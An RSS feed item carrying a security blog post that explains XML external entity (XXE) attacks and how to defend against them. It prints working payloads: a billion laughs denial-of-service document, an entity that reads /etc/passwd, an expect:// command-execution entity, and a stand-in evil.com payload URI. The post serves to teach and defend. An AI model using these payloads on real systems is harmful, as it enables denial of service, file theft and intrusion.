<?xml version="1.0" encoding="utf-8" standalone="yes" ?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Cave Confessions</title>
    <link>//caveconfessions.com/tags/xml/index.xml</link>
    <description>Recent content on Cave Confessions</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <copyright>All rights reserved - 2018</copyright>
    <atom:link href="//caveconfessions.com/tags/xml/index.xml" rel="self" type="application/rss+xml" />
    
    <item>
      <title>XXE - The Ugly Side of XML</title>
      <link>//caveconfessions.com/xxe-ugly-side-of-xml/</link>
      <pubDate>Sat, 06 Feb 2016 16:00:00 -0600</pubDate>
      
      <guid>//caveconfessions.com/xxe-ugly-side-of-xml/</guid>
      <description>&lt;p&gt;The eXtensible Markup Language (XML) has a very long and illustrious reputation
for being the go-to language for storing and transferring self-describing data.
Unfortunately though, XML&amp;rsquo;s roots have presented a problem that can plague many
improperly configured parsers. This problem is known as XML eXternal Entity
(XXE) attacks.&lt;/p&gt;

&lt;h2 id=&#34;extensible-markup-language-xml&#34;&gt;Extensible Markup Language (XML)&lt;/h2&gt;

&lt;p&gt;&lt;a href=&#34;https://en.wikipedia.org/wiki/XML&#34;&gt;Extensible Markup Language (XML)&lt;/a&gt; is
designed to be a markup language that expresses data in a format that is both
human and machine readable. It is defined by the
&lt;a href=&#34;https://www.w3.org/TR/REC-xml/&#34;&gt;W3C&amp;rsquo;s XML 1.0 Specification&lt;/a&gt;. XML is actually
a subset of the &lt;a href=&#34;https://en.wikipedia.org/wiki/Standard_Generalized_Markup_Language&#34;&gt;Standard Generalized Markup Language
(SGML)&lt;/a&gt; and
it is from this specification that XML inherited the &lt;a href=&#34;https://en.wikipedia.org/wiki/Document_type_definition&#34;&gt;Document Type Definition
(DTD)&lt;/a&gt;. A DTD
declares the schema that an XML document is expected to follow. Here is an
example of an XML document that lays out a web page (XHTML); its DTD header
names the definition of the tags that are acceptable in the page:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&#34;language-xml&#34;&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;
&amp;lt;!DOCTYPE html PUBLIC
	&amp;quot;-//W3C//DTD XHTML 1.0 Transitional//EN&amp;quot;
	&amp;quot;DTD/xhtml1-transitional.dtd&amp;quot;&amp;gt;
&amp;lt;html
	xmlns=&amp;quot;http://www.w3.org/1999/xhtml&amp;quot;
	xml:lang=&amp;quot;en&amp;quot; lang=&amp;quot;en&amp;quot;&amp;gt;
	&amp;lt;head&amp;gt;
		&amp;lt;title&amp;gt;Page Title&amp;lt;/title&amp;gt;
	&amp;lt;/head&amp;gt;

	&amp;lt;body bgcolor=&amp;quot;#FFFFFF&amp;quot; link=&amp;quot;#000000&amp;quot; text=&amp;quot;red&amp;quot;&amp;gt;
		&amp;lt;p&amp;gt;Page Content&amp;lt;/p&amp;gt;
	&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&#34;document-type-definition-dtd&#34;&gt;Document Type Definition (DTD)&lt;/h2&gt;

&lt;p&gt;The Document Type Definition (DTD) defines the building blocks of the XML
document. It does this by laying out the acceptable elements and attributes
allowed in the document. This definition can be made either inline (in the
document), or held in an external document.&lt;/p&gt;
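
&lt;p&gt;As a rough sketch of the inline form, the document below declares its own
elements and one attribute before using them. The &lt;code&gt;post&lt;/code&gt; element, its
children, and the &lt;code&gt;post.dtd&lt;/code&gt; file name are hypothetical and only there
for illustration:&lt;/p&gt;

&lt;pre&gt;&lt;code class=&#34;language-xml&#34;&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;
&amp;lt;!-- Hypothetical example. The external form would instead read:
     &amp;lt;!DOCTYPE post SYSTEM &amp;quot;post.dtd&amp;quot;&amp;gt; with the declarations in that file. --&amp;gt;
&amp;lt;!DOCTYPE post [
 &amp;lt;!-- post must contain exactly one name followed by one message --&amp;gt;
 &amp;lt;!ELEMENT post (name, message)&amp;gt;
 &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;
 &amp;lt;!ELEMENT message (#PCDATA)&amp;gt;
 &amp;lt;!-- post may carry an optional lang attribute --&amp;gt;
 &amp;lt;!ATTLIST post lang CDATA #IMPLIED&amp;gt;
]&amp;gt;
&amp;lt;post lang=&amp;quot;en&amp;quot;&amp;gt;
 &amp;lt;name&amp;gt;Joshua Barone&amp;lt;/name&amp;gt;
 &amp;lt;message&amp;gt;Hello&amp;lt;/message&amp;gt;
&amp;lt;/post&amp;gt;
&lt;/code&gt;&lt;/pre&gt;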

&lt;p&gt;A DTD can also declare entities with ENTITY. An entity works like a variable
or a macro: it gives a name to large or unwieldy data so that the data can be
reused in several places within the document. There are two kinds of entity
declaration. The first is the general entity:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;!ENTITY author &amp;quot;Joshua Barone&amp;quot; &amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The entity can then be referenced anywhere in the document:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;name&amp;gt;&amp;amp;author;&amp;lt;/name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Which would be rendered as:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;name&amp;gt;Joshua Barone&amp;lt;/name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;There is also the parameter entity, which is declared by adding the
&lt;code&gt;%&lt;/code&gt; character. A parameter entity is referenced as &lt;code&gt;%name;&lt;/code&gt;
rather than &lt;code&gt;&amp;amp;name;&lt;/code&gt;, and only inside the DTD itself:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;!ENTITY % author &amp;quot;Joshua Barone&amp;quot; &amp;gt;
&amp;lt;!ENTITY awesome &amp;quot;%author; is awesome!&amp;quot; &amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The general entity &lt;code&gt;awesome&lt;/code&gt; is then used as before:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;message&amp;gt;&amp;amp;awesome;&amp;lt;/message&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Which would be rendered as:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;message&amp;gt;Joshua Barone is awesome!&amp;lt;/message&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The magic that happened here is that the parameter entity&amp;rsquo;s content
could be used in the definition of another entity. Note that the XML
specification only permits a parameter reference inside another declaration
when the declarations live in an external DTD, not in the inline one. This
will become important later.&lt;/p&gt;

&lt;h2 id=&#34;the-attack&#34;&gt;The Attack&lt;/h2&gt;

&lt;p&gt;All of this leads up to the actual attack. XML eXternal Entity (XXE)
attacks work by leveraging the fact that DTD entities can be defined in an
external source. These external definitions use the SYSTEM keyword to denote
that an external document is to be parsed and included. They have the
following syntax:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;lt;!ENTITY name SYSTEM &amp;quot;uri&amp;quot; &amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Here name specifies the name of the entity that will hold the contents of the
parsed document, and uri refers to the URI where the document can be found.
The fact that a URI is used is where the danger really lies. The URI can
be used to reference all of the following:&lt;/p&gt;

&lt;dl&gt;
&lt;dt&gt;Payload Document&lt;/dt&gt;
&lt;dd&gt;A document where a more complex XXE attack can be staged:
&lt;code&gt;http://evil.com/payload.dtd&lt;/code&gt;&lt;/dd&gt;
&lt;dt&gt;Local File&lt;/dt&gt;
&lt;dd&gt;Any document stored on the local machine that the current user
context has access to: &lt;code&gt;file:///etc/passwd&lt;/code&gt;&lt;/dd&gt;
&lt;dt&gt;Filters&lt;/dt&gt;
&lt;dd&gt;Languages like PHP, Java, and others provide specific syntax for defining
filters in the URI: &lt;code&gt;php://filter/convert.base64-encode/resource=index.php&lt;/code&gt;&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;And there are others. The only limit is the attacker&amp;rsquo;s imagination in abusing the URI.&lt;/p&gt;

&lt;h3 id=&#34;billion-laughs-attack&#34;&gt;Billion Laughs Attack&lt;/h3&gt;

&lt;p&gt;The Billion Laughs Attack is a simple denial of service (DoS) attack that is
usually discussed alongside XXE. It needs no external document; it works purely
by using the expansion properties of entities in the DTD language.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&#34;language-xml&#34;&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;
&amp;lt;!DOCTYPE lolz [
 &amp;lt;!ENTITY lol &amp;quot;lol&amp;quot;&amp;gt;
 &amp;lt;!ELEMENT lolz (#PCDATA)&amp;gt;
 &amp;lt;!ENTITY lol1 &amp;quot;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;amp;lol;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol2 &amp;quot;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;amp;lol1;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol3 &amp;quot;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;amp;lol2;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol4 &amp;quot;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;amp;lol3;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol5 &amp;quot;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;amp;lol4;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol6 &amp;quot;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;amp;lol5;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol7 &amp;quot;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;amp;lol6;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol8 &amp;quot;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;amp;lol7;&amp;quot;&amp;gt;
 &amp;lt;!ENTITY lol9 &amp;quot;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;amp;lol8;&amp;quot;&amp;gt;
]&amp;gt;
&amp;lt;lolz&amp;gt;&amp;amp;lol9;&amp;lt;/lolz&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This incredibly small amount of code (&amp;lt; 1KB) will expand to take up
approximately 3 gigabytes of memory because of the exponential growth built
into the entity definitions. The single &lt;code&gt;lol9&lt;/code&gt; is replaced with 10
&lt;code&gt;lol8&lt;/code&gt; entities, which are each replaced by 10 &lt;code&gt;lol7&lt;/code&gt;
entities, and so on down to &lt;code&gt;lol&lt;/code&gt;. The end result is 10&lt;sup&gt;9&lt;/sup&gt;
(one billion) copies of the three-character string &lt;code&gt;lol&lt;/code&gt;.&lt;/p&gt;

&lt;h3 id=&#34;file-exfiltration&#34;&gt;File Exfiltration&lt;/h3&gt;

&lt;p&gt;This attack uses the external nature of the ENTITY to include a file on the
local system. Remember that this is local to the system that is parsing the XML.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&#34;language-xml&#34;&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;
&amp;lt;!DOCTYPE hacks [
 &amp;lt;!ENTITY passwd SYSTEM &amp;quot;file:///etc/passwd&amp;quot; &amp;gt;
]&amp;gt;
&amp;lt;hacks&amp;gt;&amp;amp;passwd;&amp;lt;/hacks&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;When this file is parsed, the hacks tags would contain the content of the
server&amp;rsquo;s passwd file.&lt;/p&gt;

&lt;h3 id=&#34;remote-code-execution&#34;&gt;Remote Code Execution&lt;/h3&gt;

&lt;p&gt;If the vulnerable server is running PHP and has the expect extension
installed, it may be open to even more insidious attacks. The expect extension is
designed to allow a PHP application to run command line commands and
interact with them. It also registers the &lt;code&gt;expect://&lt;/code&gt; wrapper for use in
a URI, which means that it can be used in an XXE attack.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&#34;language-xml&#34;&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;
&amp;lt;!DOCTYPE hacks [
 &amp;lt;!ENTITY cmd SYSTEM &amp;quot;expect://id&amp;quot; &amp;gt;
]&amp;gt;
&amp;lt;hacks&amp;gt;&amp;amp;cmd;&amp;lt;/hacks&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This would execute the &lt;code&gt;id&lt;/code&gt; command on the system and place the results
inside the hacks tags. This would tell an attacker exactly what context
and privileges would be available for further commands or file requests.&lt;/p&gt;

&lt;h3 id=&#34;and-many-more&#34;&gt;And Many More&amp;hellip;&lt;/h3&gt;

&lt;p&gt;There are many other things that could be done by leveraging XXE attacks. These
include &lt;a href=&#34;https://goo.gl/9em1lH&#34;&gt;Out-Of-Band attacks&lt;/a&gt;, which still
allow for exfiltration even when the contents of the XML aren&amp;rsquo;t being reflected
back to the attacker, and file uploads, which target Java parsers that can be
made to download jar files.&lt;/p&gt;

&lt;h2 id=&#34;defending&#34;&gt;Defending&lt;/h2&gt;

&lt;p&gt;To defend against this type of attack, it first needs to be understood what is
vulnerable. The vulnerabilities lie in the parsing of the XML. Here are a few
examples of where XML is being used and parsed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;File Uploads

&lt;ul&gt;
&lt;li&gt;Document Formats (OOXML, PDF, ODF, GXML, etc…)&lt;/li&gt;
&lt;li&gt;Configuration Files&lt;/li&gt;
&lt;li&gt;Image Formats (SVG, EXIF headers, etc…)&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Network Protocols

&lt;ul&gt;
&lt;li&gt;SOAP&lt;/li&gt;
&lt;li&gt;XMLRPC&lt;/li&gt;
&lt;li&gt;REST&lt;/li&gt;
&lt;li&gt;XMPP&lt;/li&gt;
&lt;li&gt;SAML&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is an incomplete list, as there are more scenarios that need to be
considered. That said, XXE defense comes down to one axiom.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Know thy parser&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Once XXE attacks became widely known, three different approaches were taken
to solve the problem.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Don&amp;rsquo;t reflect the XML back to the user:&lt;/p&gt;

&lt;p&gt;This is the more naive approach to fixing the problem. It assumes that,
as in the examples above, the attack requires the attacking entity to be
included in a tag whose contents are reflected back to the attacker. But this
is certainly not the case. An attacker could make use of error messages,
differences in timing, and even Out-Of-Band attack vectors to achieve the
same ends.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Allow developers to disable external entity parsing:&lt;/p&gt;

&lt;p&gt;This solution is a great step in the correct direction. However, it is still
lacking. If the developers are not aware that this is something they even
need to be concerned about, then how would they know to go looking for the
feature that allows them to disable it?&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;External entity parsing disabled by default:&lt;/p&gt;

&lt;p&gt;This is the solution. There are a few notes here though.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Don&amp;rsquo;t turn it on&lt;/li&gt;
&lt;li&gt;Make sure the parser stays up to date and patched&lt;/li&gt;
&lt;li&gt;Use XSD instead of DTD for schema declarations.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ol&gt;
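
&lt;p&gt;As a rough illustration of the last note in the list above, a structure that
would otherwise be declared in a DTD can be described in XSD without any
entity declarations. This is only a sketch: the &lt;code&gt;post&lt;/code&gt; element and its
children are hypothetical names, and the parser still has to keep external
entity parsing off for any DOCTYPE it is handed.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&#34;language-xml&#34;&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;
&amp;lt;!-- Hypothetical schema: a post element holding a name and a message. --&amp;gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;
 &amp;lt;xs:element name=&amp;quot;post&amp;quot;&amp;gt;
  &amp;lt;xs:complexType&amp;gt;
   &amp;lt;!-- children must appear in this order, once each --&amp;gt;
   &amp;lt;xs:sequence&amp;gt;
    &amp;lt;xs:element name=&amp;quot;name&amp;quot; type=&amp;quot;xs:string&amp;quot;/&amp;gt;
    &amp;lt;xs:element name=&amp;quot;message&amp;quot; type=&amp;quot;xs:string&amp;quot;/&amp;gt;
   &amp;lt;/xs:sequence&amp;gt;
   &amp;lt;!-- optional attribute on post --&amp;gt;
   &amp;lt;xs:attribute name=&amp;quot;lang&amp;quot; type=&amp;quot;xs:string&amp;quot; use=&amp;quot;optional&amp;quot;/&amp;gt;
  &amp;lt;/xs:complexType&amp;gt;
 &amp;lt;/xs:element&amp;gt;
&amp;lt;/xs:schema&amp;gt;
&lt;/code&gt;&lt;/pre&gt;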

&lt;p&gt;If you are using a parser that relies on method #1, it would be best to change
parsers. If you are using a parser that relies on method #2, then all the
developers need to be aware of the dangers of XXE attacks and ensure that
external entity parsing is turned off.&lt;/p&gt;</description>
    </item>
    
  </channel>
</rss>